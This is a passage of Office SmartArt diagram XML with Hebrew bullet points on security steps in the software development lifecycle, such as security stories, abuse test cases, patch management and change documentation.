        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{1EEDED31-26BA-4C84-A1C8-207CE87C9ED8}">
      <dgm:prSet phldrT="[Text]" custT="1"/>
      <dgm:spPr>
        <a:solidFill>
          <a:schemeClr val="bg1">
            <a:lumMod val="95000"/>
            <a:alpha val="90000"/>
          </a:schemeClr>
        </a:solidFill>
      </dgm:spPr>
      <dgm:t>
        <a:bodyPr lIns="54000" tIns="108000" rIns="36000" bIns="90000"/>
        <a:lstStyle/>
        <a:p>
          <a:pPr marL="82800" indent="-82800" rtl="1">
            <a:lnSpc>
              <a:spcPts val="1000"/>
            </a:lnSpc>
          </a:pPr>
          <a:r>
            <a:rPr lang="he-IL" sz="900" noProof="0" dirty="0" smtClean="0">
              <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:rPr>
            <a:t>וודאו כי מנהל המערכת מאשר את קבלת הסיכון או מספק משאבים נוספים.</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="900" noProof="0" dirty="0">
            <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
          </a:endParaRPr>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{CB2D30D8-ADE8-47F4-842B-C4E86D043820}" type="parTrans" cxnId="{FA17222E-B5D9-476A-911C-0B27EEC745DA}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{366A4A6D-1506-4C60-AB7F-658BB360DE46}" type="sibTrans" cxnId="{FA17222E-B5D9-476A-911C-0B27EEC745DA}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{8D5E0A5A-E1D6-43E4-B810-AC84A8E4EE69}">
      <dgm:prSet phldrT="[Text]" custT="1"/>
      <dgm:spPr>
        <a:solidFill>
          <a:schemeClr val="bg1">
            <a:lumMod val="95000"/>
            <a:alpha val="90000"/>
          </a:schemeClr>
        </a:solidFill>
      </dgm:spPr>
      <dgm:t>
        <a:bodyPr lIns="54000" tIns="108000" rIns="36000" bIns="90000"/>
        <a:lstStyle/>
        <a:p>
          <a:pPr marL="82800" indent="-82800" rtl="1">
            <a:lnSpc>
              <a:spcPts val="1000"/>
            </a:lnSpc>
          </a:pPr>
          <a:r>
            <a:rPr lang="he-IL" sz="900" noProof="0" dirty="0" smtClean="0">
              <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:rPr>
            <a:t>בכל סבב פיתוח, וודאו כי נכתבים </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="900" noProof="0" dirty="0" smtClean="0">
              <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:rPr>
            <a:t>security stories</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="he-IL" sz="900" noProof="0" dirty="0" smtClean="0">
              <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:rPr>
            <a:t> המכילים אילוצים המתווספים לדרישות הלא-פונקציונאליות.</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="900" noProof="0" dirty="0">
            <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
          </a:endParaRPr>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{17F79DB3-10CF-4189-A38B-64B5A33ABD78}" type="parTrans" cxnId="{E969BADF-9120-4FC4-B787-06681353B1F2}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{AC8D957A-0263-4AF0-8D93-F60F8F88B92B}" type="sibTrans" cxnId="{E969BADF-9120-4FC4-B787-06681353B1F2}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{0786C881-DD5F-4C34-8E15-D85B8862AF8C}">
      <dgm:prSet custT="1"/>
      <dgm:spPr>
        <a:solidFill>
          <a:schemeClr val="bg1">
            <a:lumMod val="95000"/>
            <a:alpha val="90000"/>
          </a:schemeClr>
        </a:solidFill>
      </dgm:spPr>
      <dgm:t>
        <a:bodyPr lIns="54000" tIns="108000" rIns="36000" bIns="90000"/>
        <a:lstStyle/>
        <a:p>
          <a:pPr marL="82800" indent="-82800" rtl="1">
            <a:lnSpc>
              <a:spcPts val="1000"/>
            </a:lnSpc>
            <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            <a:buChar char="•"/>
          </a:pPr>
          <a:r>
            <a:rPr lang="he-IL" sz="900" noProof="0" dirty="0" smtClean="0">
              <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:rPr>
            <a:t>מכנו את ההטמעה המאובטחת של היישום, ממשקים וכל הרכיבים הנדרשים, לרבות הדרישה להענקת הרשאות.</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="900" noProof="0" dirty="0">
            <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
          </a:endParaRPr>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{302B31FD-46E7-4A6F-8969-E535A47E5F7D}" type="parTrans" cxnId="{09CDA0D1-29B2-4EB5-B634-EBDFA51CC760}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{DE67E8EF-0263-45D4-8441-4818F5A7CC37}" type="sibTrans" cxnId="{09CDA0D1-29B2-4EB5-B634-EBDFA51CC760}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{12AA9EA7-2C9B-4C37-BCBC-32DFB924C945}">
      <dgm:prSet custT="1"/>
      <dgm:spPr>
        <a:solidFill>
          <a:schemeClr val="bg1">
            <a:lumMod val="95000"/>
            <a:alpha val="90000"/>
          </a:schemeClr>
        </a:solidFill>
      </dgm:spPr>
      <dgm:t>
        <a:bodyPr lIns="54000" tIns="108000" rIns="36000" bIns="90000"/>
        <a:lstStyle/>
        <a:p>
          <a:pPr marL="82800" indent="-82800" rtl="1">
            <a:lnSpc>
              <a:spcPts val="1000"/>
            </a:lnSpc>
            <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            <a:buChar char="•"/>
          </a:pPr>
          <a:r>
            <a:rPr lang="he-IL" sz="900" noProof="0" dirty="0" smtClean="0">
              <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:rPr>
            <a:t>בידקו את המרכיבים הטכניים והמיזוג עם ארכיטקטורת התשתיות ותאם את הבדיקות העסקיות.</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="900" noProof="0" dirty="0">
            <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
          </a:endParaRPr>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{D7ED5AB5-1EE5-46EF-85DF-A50461709E5B}" type="parTrans" cxnId="{4433BD31-32BC-45D6-99C4-23BB4981B16A}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{626D3B2A-633B-4614-80CF-C863B5E3A402}" type="sibTrans" cxnId="{4433BD31-32BC-45D6-99C4-23BB4981B16A}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{2EB5BA89-7326-49E6-8C50-CA4D2EDD6B98}">
      <dgm:prSet custT="1"/>
      <dgm:spPr>
        <a:solidFill>
          <a:schemeClr val="bg1">
            <a:lumMod val="95000"/>
            <a:alpha val="90000"/>
          </a:schemeClr>
        </a:solidFill>
      </dgm:spPr>
      <dgm:t>
        <a:bodyPr lIns="54000" tIns="108000" rIns="36000" bIns="90000"/>
        <a:lstStyle/>
        <a:p>
          <a:pPr marL="82800" indent="-82800" rtl="1">
            <a:lnSpc>
              <a:spcPts val="1000"/>
            </a:lnSpc>
            <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            <a:buChar char="•"/>
          </a:pPr>
          <a:r>
            <a:rPr lang="he-IL" sz="900" noProof="0" dirty="0" smtClean="0">
              <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:rPr>
            <a:t>צרו מקרי בדיקה ל"שימוש" ול"ניצול" בהיבטים טכניים ועסקיים.</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="900" noProof="0" dirty="0">
            <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
          </a:endParaRPr>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{A465B7DC-98C2-4A6A-9EEC-07AA72ABFE24}" type="parTrans" cxnId="{A237FCE4-E3EA-4BF5-8070-9A890220F375}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{CFFFC2CE-8720-46F3-A01D-0F06B54F1C44}" type="sibTrans" cxnId="{A237FCE4-E3EA-4BF5-8070-9A890220F375}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{41228087-2C8A-42B2-95A5-6DC05A825928}">
      <dgm:prSet custT="1"/>
      <dgm:spPr>
        <a:solidFill>
          <a:schemeClr val="bg1">
            <a:lumMod val="95000"/>
            <a:alpha val="90000"/>
          </a:schemeClr>
        </a:solidFill>
      </dgm:spPr>
      <dgm:t>
        <a:bodyPr lIns="54000" tIns="108000" rIns="36000" bIns="90000"/>
        <a:lstStyle/>
        <a:p>
          <a:pPr marL="82800" indent="-82800" rtl="1">
            <a:lnSpc>
              <a:spcPts val="1000"/>
            </a:lnSpc>
            <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            <a:buChar char="•"/>
          </a:pPr>
          <a:r>
            <a:rPr lang="he-IL" sz="900" noProof="0" dirty="0" smtClean="0">
              <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:rPr>
            <a:t>נהלו בדיקות אבטחת מידע בהתאם לתהליכים פנימיים, דרישות ההגנה ורמת הסיכון המשוערת לכל יישום.</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="900" noProof="0" dirty="0">
            <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
          </a:endParaRPr>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{9F0464B5-1719-4B9D-B467-B6E72A6B06B8}" type="parTrans" cxnId="{5D4CC039-79CA-43C8-80BE-7DE8BDF97535}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{6BB77A12-2E7C-416D-B59F-77A0668E86F7}" type="sibTrans" cxnId="{5D4CC039-79CA-43C8-80BE-7DE8BDF97535}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{E98F482C-ABEC-458F-9169-7E2DCBC80573}">
      <dgm:prSet custT="1"/>
      <dgm:spPr>
        <a:solidFill>
          <a:schemeClr val="bg1">
            <a:lumMod val="95000"/>
            <a:alpha val="90000"/>
          </a:schemeClr>
        </a:solidFill>
      </dgm:spPr>
      <dgm:t>
        <a:bodyPr lIns="54000" tIns="108000" rIns="36000" bIns="90000"/>
        <a:lstStyle/>
        <a:p>
          <a:pPr marL="82800" indent="-82800" rtl="1">
            <a:lnSpc>
              <a:spcPts val="1000"/>
            </a:lnSpc>
            <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            <a:buChar char="•"/>
          </a:pPr>
          <a:r>
            <a:rPr lang="he-IL" sz="900" noProof="0" dirty="0" smtClean="0">
              <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:rPr>
            <a:t>הכניסו את היישום לשלב התפעול ושדרוג מגרסאות ישנות של היישומים במידת הצורך.</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="900" noProof="0" dirty="0">
            <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
          </a:endParaRPr>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{79CA7AB6-88B9-48D0-9CC6-7BC9B990BF70}" type="parTrans" cxnId="{65EE5B13-93D8-43B4-8C8B-2CDC6B92FA69}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{71BD76A0-9CD4-4F82-AB21-32F91C00A719}" type="sibTrans" cxnId="{65EE5B13-93D8-43B4-8C8B-2CDC6B92FA69}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{F956EB39-E8CB-48FC-AD46-1E92AE8A6896}">
      <dgm:prSet custT="1"/>
      <dgm:spPr>
        <a:solidFill>
          <a:schemeClr val="bg1">
            <a:lumMod val="95000"/>
            <a:alpha val="90000"/>
          </a:schemeClr>
        </a:solidFill>
      </dgm:spPr>
      <dgm:t>
        <a:bodyPr lIns="54000" tIns="108000" rIns="36000" bIns="90000"/>
        <a:lstStyle/>
        <a:p>
          <a:pPr marL="82800" indent="-82800" rtl="1">
            <a:lnSpc>
              <a:spcPts val="1000"/>
            </a:lnSpc>
            <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            <a:buChar char="•"/>
          </a:pPr>
          <a:r>
            <a:rPr lang="he-IL" sz="900" noProof="0" dirty="0" smtClean="0">
              <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:rPr>
            <a:t>סיימו את כל המסמכים, לרבות בסיס הנתונים של בקרת השינויים (</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="900" noProof="0" dirty="0" smtClean="0">
              <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:rPr>
            <a:t>CMDB</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="he-IL" sz="900" noProof="0" dirty="0" smtClean="0">
              <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:rPr>
            <a:t>) וארכיטקטורת אבטחת המידע.</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="900" noProof="0" dirty="0">
            <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
          </a:endParaRPr>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{D5821CEF-2BA3-45AD-8104-2E6DBCD3E45A}" type="parTrans" cxnId="{51FE03A2-95FC-4593-B309-5C70ADB2D661}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{45E5A838-65BF-4DC0-9DDB-47B09E1B850D}" type="sibTrans" cxnId="{51FE03A2-95FC-4593-B309-5C70ADB2D661}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{0F1BC791-4030-4943-BF3E-AB04F34C4F7B}">
      <dgm:prSet phldrT="[Text]" custT="1"/>
      <dgm:spPr>
        <a:solidFill>
          <a:schemeClr val="bg1">
            <a:lumMod val="95000"/>
            <a:alpha val="90000"/>
          </a:schemeClr>
        </a:solidFill>
      </dgm:spPr>
      <dgm:t>
        <a:bodyPr lIns="54000" tIns="108000" rIns="36000"/>
        <a:lstStyle/>
        <a:p>
          <a:pPr marL="82800" indent="-82800" rtl="1">
            <a:lnSpc>
              <a:spcPts val="1000"/>
            </a:lnSpc>
            <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            <a:buChar char="•"/>
          </a:pPr>
          <a:r>
            <a:rPr lang="he-IL" sz="900" noProof="0" dirty="0" smtClean="0">
              <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:rPr>
            <a:t>שלב התפעול צריך לכלול הנחיות לניהול אבטחת המידע ביישום (כגון ניהול עדכוני אבטחה).</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="900" noProof="0" dirty="0">
            <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
          </a:endParaRPr>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{CEF7431A-7FAF-4C81-8757-B83745E32E65}" type="parTrans" cxnId="{933F45A9-8708-4236-8BC5-F5E02A16A222}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{183092ED-C34F-4C67-AD86-DBA26926C0B6}" type="sibTrans" cxnId="{933F45A9-8708-4236-8BC5-F5E02A16A222}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{75788DEC-F104-4D63-8263-F0E0AE5B27C0}">
      <dgm:prSet phldrT="[Text]" custT="1"/>
      <dgm:spPr>
        <a:solidFill>
          <a:schemeClr val="bg1">
            <a:lumMod val="95000"/>
            <a:alpha val="90000"/>
          </a:schemeClr>
        </a:solidFill>
      </dgm:spPr>
      <dgm:t>
        <a:bodyPr lIns="54000" tIns="108000" rIns="36000"/>
        <a:lstStyle/>
        <a:p>
          <a:pPr marL="82800" indent="-82800" rtl="1">
            <a:lnSpc>
              <a:spcPts val="1000"/>
            </a:lnSpc>
            <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            <a:buChar char="•"/>
          </a:pPr>
          <a:r>
            <a:rPr lang="he-IL" sz="900" noProof="0" dirty="0" smtClean="0">
              <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:rPr>
            <a:t>העלו את מודעות אבטחת המידע למשתמשים ונהלו חיכוכים בין שימוש לבין אבטחת מידע.</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="900" noProof="0" dirty="0">
            <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
          </a:endParaRPr>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{785380F0-76FD-49D3-B0D0-9014B3A1F824}" type="parTrans" cxnId="{DC6147F2-9FBB-4440-A828-2607DFB9A7A7}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{21A34C5E-A433-49F0-AA31-3C81C351C3C8}" type="sibTrans" cxnId="{DC6147F2-9FBB-4440-A828-2607DFB9A7A7}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{440A1E25-60F3-4F96-9C3A-52A6BF8FCE2F}">
      <dgm:prSet phldrT="[Text]" custT="1"/>
      <dgm:spPr>
        <a:solidFill>
          <a:schemeClr val="bg1">
            <a:lumMod val="95000"/>
            <a:alpha val="90000"/>
          </a:schemeClr>
        </a:solidFill>
      </dgm:spPr>
      <dgm:t>
        <a:bodyPr lIns="54000" tIns="108000" rIns="36000"/>
        <a:lstStyle/>
        <a:p>
          <a:pPr marL="82800" indent="-82800" rtl="1">
            <a:lnSpc>
              <a:spcPts val="1000"/>
            </a:lnSpc>
            <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            <a:buChar char="•"/>
          </a:pPr>
          <a:r>
            <a:rPr lang="he-IL" sz="900" noProof="0" dirty="0" smtClean="0">
              <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:rPr>
            <a:t>תכננו ונהלו שינויים, דוגמת הגירה לגרסאות חדשות של היישום או רכיבים אחרים כגון מערכת הפעלה, שכבת ה-</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="900" noProof="0" dirty="0" smtClean="0">
              <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:rPr>
            <a:t>middleware</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="he-IL" sz="900" noProof="0" dirty="0" smtClean="0">
              <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:rPr>
            <a:t> וספריות הקוד.</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="900" noProof="0" dirty="0">
            <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
          </a:endParaRPr>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{B2809C65-C9E5-4768-8DBC-18E8FB9BE2FD}" type="parTrans" cxnId="{E7DED103-6841-4E5C-AA99-EB073F4E5BE7}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{8DE59DC2-D4E0-4977-8BF9-3CBFC4ECDFF7}" type="sibTrans" cxnId="{E7DED103-6841-4E5C-AA99-EB073F4E5BE7}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{F538D215-0B96-4052-865C-D03A281B1284}">
      <dgm:prSet phldrT="[Text]" custT="1"/>
      <dgm:spPr>
        <a:solidFill>
          <a:schemeClr val="bg1">
            <a:lumMod val="95000"/>
            <a:alpha val="90000"/>
